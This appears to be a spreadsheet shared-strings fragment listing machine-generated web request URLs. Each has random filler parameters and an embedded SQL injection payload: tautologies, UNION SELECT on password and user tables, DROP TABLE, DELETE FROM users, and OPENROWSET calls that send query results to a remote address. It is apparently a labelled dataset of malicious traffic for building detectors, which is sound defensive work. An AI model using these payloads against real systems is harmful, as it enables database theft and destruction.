    <t>/pkbn2likeguuormyopt/vcpnsbxc0b0/mhtlteagaiaekwhanixe/tsea/s8ee8zhttn8tsfss/l6@glh40asxvi9jf/i7qyt1-n@3qeuo0mzr/wn2eoyieromooar.mdb?yqouuu3=3alew6(et&amp;mdatoa8itr=oa&amp;ii=rotoesoota&amp;thdojknen6=ndk4'++);++delete++from+++users+where+++upper(username)++++=+upper('admin&amp;h6ie=n0saa+iz&amp;5icirhbnpr5eder=hu4qwpbz0z@o&amp;nenard=0n8th09&amp;einqeehu=88048&amp;vdrpogr=ljadovubdg83&amp;a5su=8643905</t>
  </si>
  <si>
    <t>/etrfod/nteamfonattenew/do/maotnretmmwatdshebaw/fc1dtqbetween/smym4tp./t9ooi0o3/3sbjb_aih.js?2enuuooenwielnv=26433&amp;e3tcohlw=avi4rga6sri&amp;r_ezoh6=odoetlnpv2cmbae6&amp;walnmlec=8dandszeeh4&amp;ialj3h=%tfocts&amp;vpntf=$she&amp;tpa4efs=071943&amp;8hdagkd7=ebk6ljsyfxl&amp;a7rsa=luh6nehetcaan&amp;eolel4ap8nuqs=htt'ptn&amp;te=t--nrc+8or&amp;inth=8825&amp;neeo0ae=54&amp;fner=99277&amp;rimely4oeot=or++++0&lt;&gt;(select+count(*)+++from++sesehhrw)</t>
  </si>
  <si>
    <t>/vt/ds/r1f-3oh2xm7pnr/oossiolleu9w7sugip/rrarcteqzae3aiisa.exe?lteqs3mqeuz1m=+sap6&amp;sbrlttddwodsu=ooy&amp;gexecrjkbm=ontf&amp;l9tn8itbrr0r9oi=nxxaeametdntfuvegp&amp;o8elo1odurs=27949&amp;enet3=2067&amp;flqdhnwsntpomc=vzdee7c7utxterml&amp;eoerrmefoee=irreautoexec&amp;312='+union++++select++sum(rpnns)++from+hh--&amp;iamliyhaa=hrb&amp;uadperl7j1pqn0k=ersdtfcnnaaaot&amp;8uha=nermrtasditqutfn&amp;se6niabixrezmli=77&amp;tmim8eaqe2i=el+diver:g&amp;pvc6sdfo9p=s\\kzmdtsock_streamws1+ine(x+</t>
  </si>
  <si>
    <t>/ibnh/9tsgldee.css?aejxelhda0htt=9tmzzs8zr&amp;gakse=5&amp;iscg=250&amp;etprdreeee=6507830&amp;vi2dftfcaq=stbfwree1lir&amp;td3atlsie=ormse&amp;tkauysize9e=5~pz&amp;ribiepe='+or+'6fvh'+&lt;+'x&amp;maugi=r&amp;ncesi6wiorltoo=tw2n7e9prn&amp;2cnytheeltmrr=uodq7dxaolf6&amp;cishzj=338&amp;0kmowie=ciftwhmh'&amp;sesciwa9hnlyme=eq6d</t>
  </si>
  <si>
    <t>/oo4ib9s2agnb2mrt/sntraa/canph-bd4f/varsgzninetcatxcty0no/dftpgr@9l2c6g/stdinc8hykze.mdb?nfuyt=agwp-2t4huyfttgd&amp;gr1uadosbz=fusrio&amp;extsmraaeulu=tuanincludeoe&amp;b9ztboot.inihl_=;+select++*++from++openrowset(+'sqloledb','uid=ugnti;pwd=oght0httr;network=dbmssocn;address=13.25.200.13,90123;','select+*+from+w0e1n'++)&amp;pezslh=nipe&amp;do=eeyeea0h2iro~hd\\2&amp;esteicnisuns=18968017&amp;k5a9iv=execwneshh++]&amp;gl-1rgroupbysobjectaee=passthruis12cznqutasn&amp;deaute=viinserttn&amp;etffq=eua8i&amp;pzlxrirp6ns=by1mjkydjf7b</t>
  </si>
  <si>
    <t>/rhsallechon/trqbhm@_ufees/i6kbnlc_eo0vkq1kn/xsn7jioalo/jsk/bqs_b@pbk/gotkajagdole.php4?uuvs%uanaz=nmaalshfdto&amp;1ai3elrtxpd=918272&amp;8seruhonr=542103753&amp;eaesty6a=etxpgunionluarim1wp-&amp;r8p6eiz0ealon=or++7770519&gt;81522336&amp;repms=dg6f&amp;e0=ojc8v.2c&amp;eor7khniro=1&amp;ii=72&amp;21b4=yy+in&amp;imlxtpqa=pzbelprtnszgr5&amp;lyd4=obtnigfio6iob</t>
  </si>
  <si>
    <t>/6e3/mxwgd._dvi./blbtt@u/ooc/giteo/nioyoacaeeti6ibnevg/ma3hrarrrne/5oic5jezonie/ev-m_93lmkay2vj.swf?qinm0sit2isq=5&amp;5o8.ebkm=15&amp;tsc=49&amp;mojxbu-n=onxis&amp;h9sntdtse=eoyah&amp;nonom=-xwp-h&amp;s35aheim05=;+++exec('ins'+'ert++into+++users+++++values(37819,'sla1i3ieis','eeeiznd'++))&amp;sr6lteeio=a&amp;d&amp;imdepr=97389&amp;xo5tupnosytuap=dlnwvne9gm&amp;@2xgk8d4_=m6t62eujut0e&amp;niemqi=nxhp</t>
  </si>
  <si>
    <t>/checetoarospz/et.fpxe9sjmunk-rhtv/ak1d4ti9k83ml7hg.exe?rhe9seaotn1=iowlkbykw0&amp;ndyagkg6fbtd5ei=826911632&amp;p6a=niiagnydaio&amp;d638bigroupbyoa_tt=82206&amp;ent0th=80&amp;2trefw=kie&amp;smeisedggisoqc=cl_xg-wm5@bj&amp;tgqnsaeysesehe=%u2sra8&amp;eri9ee4=53728183&amp;s1owqaeokafi=9056965&amp;ennmshetztkh='+++or++'oleu9rb'++between+++++'r'+and++'t</t>
  </si>
  <si>
    <t>/thqcdx6lb/.q2b/mnfajmvb6ukwy/ngdh5lmw3g30ov3n/tjikr0cb/lis/gvinputjmfhwupdateacceptaro3/ks9b/sit7ofepgiduttir/ojfsd@.shtml?xhh0dd=e-bm_qgk5lt&amp;aulcoesmieeeea=e+htaccestmpposition~+oeanph-+tj+fi&amp;qo=6563351&amp;ahourcpfnph-ku7ih=f3nh&amp;ybimpor=9321&amp;uw6h2e=afcl5+ef9itformarn+between+p&amp;gueh6lenxt='union+select++++password++from+++dba_password;--&amp;2siehano=oi/sntrosoegmu\\7+agroup+bye&amp;itheoap5soeem=moxp_cnywhttpou~d;ja+eje&amp;lvoifslee=4658167&amp;z8doiheetch=jehmeebotiniofo&amp;iisgj=pot|l+teireoi)o/acty&amp;jbs3rz=ahuroseacopyaer]tte+w&amp;ngm6bhhrii==aie3e\\winnt:cni&amp;fai9rdneeg=accxuqnl</t>
  </si>
  <si>
    <t>/ydobssezy.dll?havingpwp-f0d=385420&amp;uapasswdincd=be=aate?-i5&amp;qudi0fctmdropzj=599&amp;u14j7maie=pcuhowneejeq9&amp;hipakzvopen4qs.=5boot.inig~&amp;-2imgws1k=71069&amp;7rle=opvbscript7ewrtsthttpsre=naa&amp;yai='+++or+'titeainhali'+++=+++++'erjt'+'cd'&amp;sto=534&amp;hproaote0sseesa=spa&amp;dthresc3asze=a1oeboot.init+d%r&amp;sfneoesq=opt&amp;zrudlrtsruere6=0190936&amp;xbgsoundp%u9_ei=acuslincxiewdf0&amp;72ra=9sto</t>
  </si>
  <si>
    <t>/aepiehe1btoves4auir/7wmpniftkvi/l13@@w6jk9eq/2i/aqs0aswhh8eg6li/ldctajaak%uiy/mz@5mcr@r-0.php4?wol=aten1&amp;vaqeathooegqt=sitli5iiend&amp;ttss7fl1sdlrevs=/&amp;?&amp;hjnwlzeknyrx=';+++drop+++++table++++ytoaa&amp;naieceteiosehti=ra3home64w&amp;emstowssnflsr=dw&amp;rd1dal=5855037&amp;15tpmdt=areinsoopt2a&amp;shavinghhtpassi=1eeatsdei&amp;aitf=teumswesraiulm</t>
  </si>
  <si>
    <t>/m3gungfb9yes/oy-fxr/kko2ucymieqp1epexdre.jpg?irn0i=9023446257&amp;aticpnna=ef8&amp;s94wdhhte=ueoiteemsiwdh&amp;riosanitbwi==oncte+d/spm&amp;ae28roctitc5etw=gguh&amp;dyheosjltwa=+mc&amp;k8zyuyqier5=eic'|oihfnps%r&amp;krehnabniao8th=or+++++'isa'+in+++(++'++'+++)&amp;6ean=776225305</t>
  </si>
  <si>
    <t>/lb@bmfnk/iot7igfelpngh/vc5qbqylbody44lbpv/otjtrq2z3opdcvolc/i6and0eseu.html?zosdtojpae8o5o=950+or++++id&gt;5++++or+++ls_id&lt;92&amp;ff4awp9ukth-=n0oa</t>
  </si>
  <si>
    <t>/6n6ayseirr6si/0tliaoxmshe/toh0sc/sbsilsatrrdethj/xvhr7rwpaccept.shtml?2irdncnzgmq1ee='++++++++++(++++select+++top++++1+++yvfr+++from+++wdpb)++++++'&amp;hkoslap=5592</t>
  </si>
  <si>
    <t>/t_mcfunvxsx.asmx?esoosow=9&amp;4wmodz=or++'espir'+in++++(++'++'++)&amp;sieddatpli=wrl&lt;oatxservices</t>
  </si>
  <si>
    <t>/laitp_oksw1a6xov3i/40labkt/gmperlmx%uylj4libe6/12qb0domsscriptxvmeta/edsfsm/wxcy7z7dfx7f3pr.jpeg?an=382&amp;ecex=eota&amp;bi6iib2g=scinclude'&amp;dgofdugechodeletefc=ccobjvdhxs&amp;tcdirtcur=3j@-4&amp;v84r5onleiel='+++or++++'meuaeesthsr'++++&gt;+'s&amp;89axee3seesalei=9708&amp;nzo9dfn-n=nvcq7oi&amp;aiwbdzamgkn6e=uamail6y+@=aoseyu&amp;itey=9&amp;reutqea=esatr&amp;bt8i@mfua=59673748&amp;rtn5t=fgzkk5l5&amp;azeis=tc_&amp;em=aee</t>
  </si>
  <si>
    <t>/cvbej8yrm7i2o19/eizaqvkpu8rtnztyx/aenzeonbejy/wapriies8dmhrcom/sde7yee/copybr/o3ym8yh--m5/g@jw/au6szhc/rcotnew74uetaeevtlt/ip9@/m0zkrhvxxxqszlwxmtwy.asmx?gqstdine7nhtds=31540567&amp;o7hyab4y8r2gsc='++++or++++'lionpiffu'+++&gt;+++'s</t>
  </si>
  <si>
    <t>/req2z0hvc7nr4l9.js?srboekuitlm=wae&amp;atit42eet5p=stallsi&lt;&amp;d8z2oe=gusooaaonuex&amp;eosdo9ite=tidh&amp;rpef=ekdmtpy9_faw&amp;1nnrmiaeoeah3fi=ssn&amp;deeuehc=';+++++drop++table+admin&amp;iofcdsh6atetmo=2ee7e9fhoi&amp;pc_tq5b3=41770&amp;wes89=wzoe&amp;nmihtn9nmipn=5060654&amp;a9drbr=816601447&amp;2kata=ffrconnect&amp;0nsypbaoc8=3'te&amp;ehiwmeseo=0</t>
  </si>
  <si>
    <t>/esmrqosvfarnen/tniooioahysshhehu/mq.dpra8aftooqae/lvigont6ruabo/jgszd7jf/n3@katp6jxip12o/nv0/zp.zntyrr/ev5hcsxxbmzfwac@j_et/pcneiu/oi0idedrttene.nsf?enik.2tmrm_j=1&amp;vwgr6aaii=wd+accepttti0a+ntemn(ju5o3&amp;esdtitusfartgu3=ms&lt;s&amp;ulnsmp=h3_&amp;7nctnsron9nenge=llqe6koi7i&amp;atpkuwinntx.v=erro&amp;aeiath='++++)+++++union++++all+++select++9999+from++sa+++++where+++(++++''+='&amp;usccoe80taume4c=6na8e&amp;3nertboir3y4r=gn&amp;rmochawherewinntg6body1za2=2&amp;jowehomm=taelosi&amp;5aecnxahf5avs=a+wcsnan</t>
  </si>
  <si>
    <t>/ebpvmxypqjoi/ahahezcdo/1a9uiaqydgp/0i/tnnni3i/laeidss7/zt@@xk21/kr8chbj9bopsqvnwdf/loddxi/aodnc.tiff?nigwtna='++++or+++'bsulz'++++=+n'+</t>
  </si>
  <si>
    <t>/6q.@nt3.n@ehvd-op_/kvrdpi241pnz.jpg?saeaotecaeejac=2975117&amp;avl5=iirpnxouojus35&amp;iz=05&amp;5cvetofzn='+++++or+++'foiz'++++&gt;++++'s&amp;@ga8=z6rhugbeii2na2bd&amp;ox=ah?gths&amp;gdbjm=92967&amp;anolerpe5wukt=96</t>
  </si>
  <si>
    <t>/hf350vzj1bnhc./iwj/wztbmochaczjzj2dj/tiv0kmqdeleteow3/athtieuie1o/9tefeuokeenlertyums/@nmh/bnfzr1xdq-6.v9rkb/deye7wivwbes/y8o8tdnnhhadne/9m-wwg3/i@xnrdp.png?cs=8.ypyrr&amp;obi6to=annn+&amp;3trk=trsszrioeg+unwenieon&amp;eh9psomsteiats=or++++'adt'++++=+'+'&amp;glcckkhy2y=13831&amp;ettsnta0eca=-nkttjkloledmaeon&amp;naoabbllusns=nrtiaenxinildl&amp;antjeoeo9t=~i+pt:4g&amp;eeu6toepbsso=u7__lfh9&amp;92bdbetweenjmt.h5=rj_&amp;txrpdrurced=q9q0z</t>
  </si>
  <si>
    <t>/t1sbrhonaeoegwsznin/inbkz3ssve/gfromc.q.css?fby42uddmst='+union+select+++sum(tetntt)+from+p9euf0st--&amp;llbpkk@padg=56579596&amp;etsk3lt=65588287&amp;clt0r=338&amp;xmuj.pe0j.a5=olht&amp;q71cagcrir=mt</t>
  </si>
  <si>
    <t>/ecr90-ab4smtqa0.x8k4/hay-uyajconsuhqgs/lphmywveautoexec/z9cwinmbyb79v/gywjam.mnp5nzqh1k3mm/5reip/dhf/rdli.tiff?hhc4esevtepesm=riiframelcnestsryshr&amp;uuthudw3po=33&amp;iqosealxnngaa=or++'lld'+in++++(++++'++++'+)&amp;hnosoiajeadqtl=e-w6@</t>
  </si>
  <si>
    <t>/itoggejk0ni8ees/n0wfeysuqlgl/mffg1cbixfl/c4m0/zvinclude8kgmt/afhe3yhwfoj5imgj/av_el-r@s2mx4/ei.tiff?0tusieefuttof=or++++'atnju'++between+++++'r'+++and+'t'&amp;edntc1ustee3ho=9363876&amp;vinputy.openstdinlh6lsg2=&lt;ufwts2qcpin'r+c&amp;iqzezoren=p&amp;um3e=31&amp;6dnetrsbeedrwmt=usrl++ilm~b&lt;e&amp;t3ethkd=eeylsgaptmwiinas&amp;ndeh=ntiaa&amp;eeu6ir8hmtfef=aei59ts%i6i+rhx~ei&amp;tdodiprieu=iettm?&amp;rutxnr0dq3=esrx9</t>
  </si>
  <si>
    <t>/oryw/n@jq0qnlsrtok/uzblsertfpiem/here8vneatdfs2et/daar0leospaeeso/staioilasnpnlo/nosuej5tr/answyda9syone5v/cechop/px0r6nmteaqic9ele/n.aaclz/thdinyrkojnxqe8sn2pk.aspx?i2whetaaydi=o4crsec'j4hb-re&amp;fnrhcr=f7lga&amp;mlhsitbwca=2990860&amp;1mosfhnltnja=34548514&amp;des6bdr='+)++union+++++all+++select+++68++from++++b5tftetatr++where+++++(''+++=++'&amp;tt=nm8evntsnc1pa&amp;esgte=os5iba&amp;pmn6m=667&amp;ohwt=ecqbfeuuvl</t>
  </si>
  <si>
    <t>/cpetch1s/cvpnkniaxmmhi/b9tp4ttmmyk@tfo/dhmgf4ncd0pvsuhe/erhtahnde2hetqqa/ju/ncts0esvpzaaabk/ixclet.jpg?rlc=87614527&amp;wd=++++or+2+++++&gt;++1&amp;mtitmfei=tpceto_8v2x</t>
  </si>
  <si>
    <t>/locationdnu/daoumq7/lkusw8/me/eesao/eaeti7sodhsae/auneilfgt/on/h2sfftufcyw-bmxy1.html?whkipyn41=5&amp;1bbnttmeeb83oc8=m2neai&amp;ssarohhooyue=e]&amp;sll=origtext'or'tameir'++=++++'6n'&amp;wqeetbr1pe=1810331&amp;dmfhtnsrs=eh&amp;tmesrvdj4eaeu4=6xetehm4enshemnr&amp;cofuda=hoiexec+eessldid&amp;lje=ipevivsrehennwr&amp;3shueeoead=-aoi</t>
  </si>
  <si>
    <t>/au2f@pt2/eeoiqusa/zsadhnmwloeconqet/kuglihinleaot5qljnt/zsh/rtehmdhdahiep/b2cur/rsqw6t8xr7ef6lw/j1n0/rl@cppc.p.allv@b.pl?steeewrh=3958&amp;ansoxuy=4&amp;ewsxt4sgioeweu6=ted5m&amp;zidtb1documentc=or+105869836=105869836&amp;lefo=+rwze&amp;servicestgcd2cprocessing-instructionudht=aexectapr&amp;inputhcikji3do=he+o@+ir)o&amp;isr=i4se&amp;nef='a&amp;mnhnn=n6prxq&amp;thurtlfomaovnt=022493&amp;ufseoael=f+el9frefe7ulhtpass&amp;diqatl=u&amp;shyntate=m&amp;2oncdo@yt9ur=61904924</t>
  </si>
  <si>
    <t>/nvoyleeggne/t56_uhuyl_y-/7hnt/uromveewnaerentx/aocadgslt/ltwp/cccmhncboot.ini/z-ztp/netcat26aseu0/pl2jjzahq/vosyisudrsef6hoed.aspx?qoptnsi=m_e@bz2&amp;qstemfhetn9dtsd='++++++++(++++select+++++top++++1++sl2+from++++eeepu)++++++++++'&amp;8oiiahxasspn=04428&amp;qgla9d0fqql=spuec)rnieg</t>
  </si>
  <si>
    <t>/otoaeseil/nfaiolol/wkbibkdybkhik9af/y6j/anewwmhd5/5nhtv/vlinknxp_qijl9he/lq-x7gmwsxxaulke9c/t1wxxh0th6pcbvd/ywfitbmoedt0eef/eeawctsouo.mdb?npa9g=\\uin&amp;hhlla2yr1se=323761&amp;ourginb=&amp;gfrom;es&amp;&amp;tw=6pnoae&amp;4._6=ionie&amp;tlr6useerenf='+++/**/+or++/**/+++++'nrn'++++&gt;++'s&amp;eisow=4mfws&amp;aexiev=4arm%n&amp;ewu8trebtsbhfs=ln4h&amp;hi4a=senbwinntm&amp;pnaeo$wr&amp;owtiia=ibeeatw</t>
  </si>
  <si>
    <t>/_o/eklmux/o9-9tbpjlh4bud/swa4kautoexecflbetweenya6er.jpeg?na1msrragm=hetep2lrmees2st&amp;jizbtnx82ohu=ohe&amp;wnph-ewtscriptga=1928064574&amp;t7eitidhsufyneu=oa=log&amp;ttwezzd7h=gueh&amp;hoo7unta7l=3500&amp;e14=wp-wp&amp;a1mnnfahtrtlr=tnnd&amp;ewp='+++or+++++''+++=+'&amp;le=995896581</t>
  </si>
  <si>
    <t>/qq3.gv-/hxylt7f-/6awzgcw8p14execs/im/tykqh7uhx/5go9awkrkllciesw/ybuphoiexxtermsxcatd/replacezdfmcrdn6iw/o22gbgxczlituj/sd7g7snabc/dz@j/shmltcrueoheeatr5g.css?teadtrhol='++++/**/++++or++/**/+++++'agi'++&gt;+'s</t>
  </si>
  <si>
    <t>/skskjvm/rlxkbn6gayjzlj-.swf?jfn=or+'0oo4e'++++between+'r'+and+'t'&amp;xmlvvftelnet4lug7=i86clvtorryttc&amp;tzderoa=tqqlftzt@hj&amp;mwp-services6q3ci=;eeaa&amp;dhd9ha=rn9lormjr2nc</t>
  </si>
  <si>
    <t>/oa/odn22fmhi6gtavuf_g2/imoc5vpxn@cql/ttnbmahf/tki2/rxkaab1biuogdfut/lfepa4goeqatnrdmgq/telnegjhn/iwh/gynetcatku/pd1xh4p/y5dquunionemofg.jpg?e7cptroxcdin=ie(dw+ni&amp;zt8zyfnph-t7i_='++++or+'tew3w'++between+++'r'++++and+++++'t&amp;wsdpo7he61=ed@t</t>
  </si>
  <si>
    <t>/umpcrrcir/mibt7scn/ztesegio/ta/d0rlob/aotimdoc/if5pnr./yoti0gmz47qv9nmp/xtx.mdb?trxml@m1rmnc0nr=or++++02726&gt;23232611249</t>
  </si>
  <si>
    <t>/lebhd9ruxdireuusuy81/4fhig/trtnlleswa/oradhreeiuju.js?oh3ridhhden=23&amp;dge8zteyeteo=saied&amp;eoohnau9abthx=xpg&amp;siw6732=150676&amp;0d4dsap=8611&amp;ed=w8tqowjaf&amp;asaiuutdepl=419493765&amp;munpehenrxs=;++++exec+++get_cust(+'x''+++++union+select+++++object_name,object_type,''x''+++from++user_objects++where+++++''sntuyuoeo''++++=++''++'++);&amp;ofambeurwrertid=maetmpd9;s&amp;hmie=ty749tlab-sxp_&amp;tnltvihhgt1srs=7563&amp;isrmw=i4n&amp;i8faitievaoeehu=921&amp;ahiwy=cmsiw</t>
  </si>
  <si>
    <t>/sjo8@qlzs8a.ok/avfvotreeiwypla/rbcxcsn6q/passthructywperl7tjvyo.jpg?laz2staenn3he=mmz|nbxstdintc+&amp;bit=mfar4&amp;agerpyno='++++)+++union++all++select+++'on7oeth0',9,996,'l7j',845+++++from++ntt++where++++(+''+=++'&amp;soola=ur&amp;estsiiruiojti=rsait$dexnahnlwhere9</t>
  </si>
  <si>
    <t>/a09/tmhlopir8unh/hfx@_w/ht0h8ee3iibiiar5tu.cfm?sx='sr+lbhanr6&amp;ga7heprtai=9312078153&amp;rn=';+drop+++table+++admin</t>
  </si>
  <si>
    <t>/oarhsd/ecge/xk/5ew_m3espugtyu/rmmiasl9wrifx/dec5wqaj/abg2-csoekn2xmv/enksix3nlhn8yrl/drxbuselectbi6xq.msf?dk=7007271&amp;t5emruoi=514366&amp;st8sot8tntai=tineeee&amp;aaatl3xwtsdm=ohs&amp;6reitg1wboeh6=90&amp;6rrecbtojesser=i5-gs&amp;ioeottidihdgt=368024&amp;wr='+union+++select++@@version,1,1,1--&amp;opotph=iiee&amp;3heaowe4vnaoo=nmutp&amp;mts5h=coe?t</t>
  </si>
  <si>
    <t>/w5qjsl-xxqzed/e-em4qecckjcztnt9n/ealh9oaecax21uisdhit/hlaicu26yn@vzjapt1ga/pngwindow.openaftpg5z/epo2knrvo7/s6orjwvnc1hi9ha/ouhepm/rqadh/4swe63lzhndhnniece/uylqn8a.png?93vy8hw=1922&amp;yt=t&amp;teoeswchttc=auujqq.&amp;otehcen=select++snirtaa++++from+all_users&amp;5nflut_w2=30941</t>
  </si>
  <si>
    <t>/rklwmzuoxojkowtnc5f/locationx3o5ybl/a@hm3zi/45erfcnnrqrsbqilbmd3.bin?ne=mtoe&amp;dnutyqc=hntpl0athbkbeilnt&amp;rlacooleeqnuf=79210875&amp;hlit5retm=oajaie&amp;vos=710&amp;u8_omrpbs1ky=n_mf43dpu30r&amp;su9dtiplpd0=7136422&amp;kkaln2nvdv9r=sftmpgaisese&amp;3kli=stdin&amp;vzso@kf=ntroaephpeisei&amp;ns=trcdds&amp;acettn7jredoqe='++++);+delete++from++users;++++commit;++dummy('</t>
  </si>
  <si>
    <t>/aaosdt0letohsnrxl/a5zy1vqaptwbqz6cojsj/tgphbflnuon/boot.inig@lfrom8fhttpsztmpv/nimeufeeo/ienezqu/86acur/3@q1xdl/ud/heasrhm5e.cgi?cf5eeemezrtoen=jjb@gatjzzd&amp;4azt4q8eratkw=heo6&amp;tlflir=and+++0&lt;&gt;(select++++count(*)++from+++++pe++where++++oehihwu&lt;&gt;)&amp;htenscv=irhnetheenhi96&amp;iehuknxuasfuc=ttstg</t>
  </si>
  <si>
    <t>/ar47p-.asmx?eniame1t=n@2yt&amp;ale8a0dr4esmph=bo&amp;ld=\\aoreplaceeivcl&amp;92spijz-=k;copys&amp;qkwd3rsspb=';+insert++++into++rn5tegnr+++values(666,'mee','nng4vht',0xfffff)&amp;ic0toszhrzcshy=mr;lau</t>
  </si>
  <si>
    <t>/ottel/rtainsegdnte/fb/ephdwffncebsfk/tr0gayci5-e3wfevi./epqoj7/pa18f8/opq6p@ffksbq/hectu.mdb?ojvstniswws=ew+o8andotpt;&amp;ehbeirhpxutn87=tv.&amp;rtea9q9w=')++++un/**/ion+++all+sel/**/ect+'unsrvn',29350,19,'2on6teeeeq',9+++++from+ltccrs++where++++(''++=+'&amp;rte=s&amp;6.q.v@k=e&amp;&amp;awtay8yjmjrte=85198&amp;le0esavsteswe=67&amp;uy9nml=9322793&amp;ons=s+p0&amp;tcmnuns8e=tke&amp;sfa9=zk1o1odh2t</t>
  </si>
  <si>
    <t>/e7ndejcnhfexe8tlnwo/h8ptexecttk3zgyve/wq-.muq6b.tt-7av/4n1qeaegacatk1dziyj/8fdm309/stttwsmghnnnyeg/uosts42slavwc/owawtgodj_f/oi.nsf?mtethatu=c=]ss$aaachildcgrlp&amp;rnt3och2=ert&amp;pfimcj=9t3'+union++++/**/+++select++tnem6rrfa++++from+++++dba_users+++where++ra++++like+++'%&amp;ga=uiyaonlikee+wic&amp;dseslpqe=ed</t>
  </si>
  <si>
    <t>/3m2gazu9bgsound/r3_/co/rl/jyrirme/ib.dll?97sb=1&amp;ehez=6404979&amp;t7ootgyiib=9064627&amp;es=pty+&amp;asu='select+customer_phone++'||'from+customers+++++'||'where++customer_surname='''||++++lv_surname||'''+++++and+++++customer_type=1';&amp;ueidvtit=s5apjenr0dl$r8&amp;id1&amp;uttabalbttesnac=&gt;fon+p)talnje+a</t>
  </si>
  <si>
    <t>/ncincludeuee1xinsertg/iw7abssfn/xnm/@8cqyvb9fvogxincludex/ffw/ri.sh?cral=618&amp;ftfbokcdgdo=qwer'++++or+newseo_v.account='itto@lx.com&amp;dreoca=8rmyl&amp;iaehyftcnrodu=ahc&amp;1bxaz=npae.c&amp;azw8=6400961&amp;wntca7iiohyt=+</t>
  </si>
  <si>
    <t>/jyf/positionqnullxexeczacceptmrby/iuennhoes8veslu0/itirua/tg/kttbfd21reczr2/agkn@p710e3f3nas7/lfieydlpe/bmp6dg-yev.mhtb/1glach4new/lgl4wyb/wu.mdb?ccatef=0305711&amp;cbr=6233851647&amp;enathlos9o0s=dl-hr@vyai&amp;-kgscriptscriptjtnson=ainvefyeeeo&amp;ra6qflje='++or++++id+++in+(++++select++++*++from++user_db+)</t>
  </si>
  <si>
    <t>/y8bei/trtrnttaenoap8oooto/eqnhmif/h1zgst3irx1h6qi.js?uu=bys&amp;q9sr=8865059&amp;wgetgxelogwma=dhe&amp;nikhzdfj=;&amp;jyee=;alter++++table+nearasal++++set+++password++++=++'drie'++where++++name+++++=++++'ntht';&amp;jinrladgohqh=8th</t>
  </si>
  <si>
    <t>/zwtk9quche/xh8/8-ahmyqlcey8/o@vkqhrogjamnvsesgi/eipte/-c1wykyzinnm6%uu/agot5tli1fgrteale/anaiwtm/amneztlna2gsdwtru/dcv/ndibiw_b4zdci5d6a.exe?i7yrxpfopeao=at7&amp;aoa=&gt;khno&amp;tjliyat=njtf-exgqs&amp;re3='++or+++'oaeo'++++like++++'aze%&amp;oee=3835795331&amp;eurxneudtsoueo=718103</t>
  </si>
  <si>
    <t>/passwdcpi_rlogkk1etcnr/zlvioihioirasogins/wqaggb/w6objectrm8hlyacceptq.gif?13ehnsotv5he=957071&amp;ujh6cmfr=ounxrt4@&amp;tioftbisber=18702&amp;w2ogafrqf=tjpk84qyu&amp;bia1s=ay&amp;9qhautoexecwdhl='+union+select+sum(2nus9so)++from+++++tadnor--&amp;edvnticsdpcfd=uha.giui&amp;tbetealntbta=nfwaon2cn&amp;0l2o=11&amp;4mellpta=1544&amp;n3samri7qoe.@=rwoeohldegmsn&amp;rtenh4h4en=5@9dbl@&amp;rntto9na=+aisl&amp;kobs5=676&amp;lt1sr=49904874</t>
  </si>
  <si>
    <t>/obee/aertxmlascriptkbfhtelnet/4gm@esyhcgy1ud/syczycdnecig9-f/ea.tiff?s7y4n=e+i);&amp;nsmhti1oeqc=trns1cxyoo&amp;izolormst=inputameoscriptzo5eyd?rsko&amp;3nf7impeainlptf=de0&amp;ndoe6tamltftw=')+union++++all++select+te++,+++++snd+++,+otesheot++++from+++++uownid+where++brtsh0ywf+++not+++in+++('soleee'++++)++and+++++m1h1+++not++in+++(++'hye'++++)+and++''+++=++'&amp;apqckowjepassthruc=3+indt7tuasl&amp;uunst5=jvriepa8</t>
  </si>
  <si>
    <t>/8wtionmrot7ttaas0zts/s@zbs0/osaaeiiocusn3qnre/adutjfinsertd5hprey/tobh2qv03ie_txnx-.htm?fi0utg=551&amp;ifnd=043&amp;la=lbehe4ucud&amp;oaha9ssshekta=3045730&amp;ac1repjytas6iz0='+)++union+++all++++select+++t9obay++++,+yhndscle+++,+++haeseh++++from+++++6he6++++where+++p8ste++not+++in++++(+'two0ssos')+++++and++ante++++not+++in+++++(+++'oaagft'++)+++and+++++''++='&amp;p8rpersaeei4wy=j@u</t>
  </si>
  <si>
    <t>/6inou1ngat.cgi?ttotmirtiliep=;++insert+into++++openrowset('sqloledb','uid=aveyre;pwd=iyffumyrd;network=dbmssocn;address=63.56.212.54,1433;','select++++*+++from+++++_sysdatabases'+);+++++select+++*++++from+++linkedorremotesrv1.master.dbo.sysdatabases&amp;mjlegeh4u=2376</t>
  </si>
  <si>
    <t>/.ehhffwpcp.pfypasswd/lk28zbjuqb/t82nrcloii/vhlddtpf2xj2ai8.324/4n.ibblwt9gyts6/z9yf1@-oum8pkhyuy/kyjkqp4hvpc/sn6dc6s5uiejrr@ta8vn/9vvkz.gurlyev3zia/ssqfougpxezylgdr4__/outurz_3.nsf?9a98hnr=mtlbenq2nunion&amp;categ&amp;dmgrtcismi=rbda7fr0wspp&amp;ib=tiioa&amp;ymixbbj7abimgn=323620&amp;6oqeofyd=s@s&amp;tnshhssnhodyn3=cgg1w9-d&amp;deleteegf=si_mk&amp;9hrina2er=chairs'++++union+++++select+++ealr+from+++dba_users+++++where+name++like+++++'%&amp;esiereonat=:4vkr&amp;hethhragncm=50851&amp;oilky=metaajcr</t>
  </si>
  <si>
    <t>/ai1yrfle/kwutlk/mcpdrp_d0ikn@5a7c/nnntolsibz/kivsginotfosegmtgtoi/kkkg-po.exe?siis=cplpa0irdtiak&amp;ree=:tdt&amp;ta9esexdyas=095136838&amp;2th3mi4n='+or++++'le'++++&gt;++'s&amp;beailaa3anmiaa=janzteal&amp;oy5emieeuheas=cmimglryzoopt2no&amp;n5rnconl=e8afi8statee&amp;9vuhsrrtb7yqo=6483&amp;sh2ofp1om6nooyy=64&amp;mchildbcopysams2cyy=ota&amp;t8nfeeam=ea.2ezkn_koy&amp;teectde1nhxew=5&amp;cojslitin5fgo=lib2&amp;f7i1re=u</t>
  </si>
  <si>
    <t>/enanm06tihaetyost/r1uschvrlks/9aav0aainetdha/idafhop/xx8/istaedolsmn/e8tw.js?sthedleoeaiulbx=eer66thinput&amp;ztnre6iomdg=47&amp;mee=60963&amp;veee=npe7_&amp;pt=goprcffj&amp;hasan2=78449790&amp;ezfehn6sm=zc5stg&amp;zxvyiaeq2e=8&amp;ul=itmir&amp;em49e=qwer'+++or+++hs_v.account='sias@lc4pi.com</t>
  </si>
  <si>
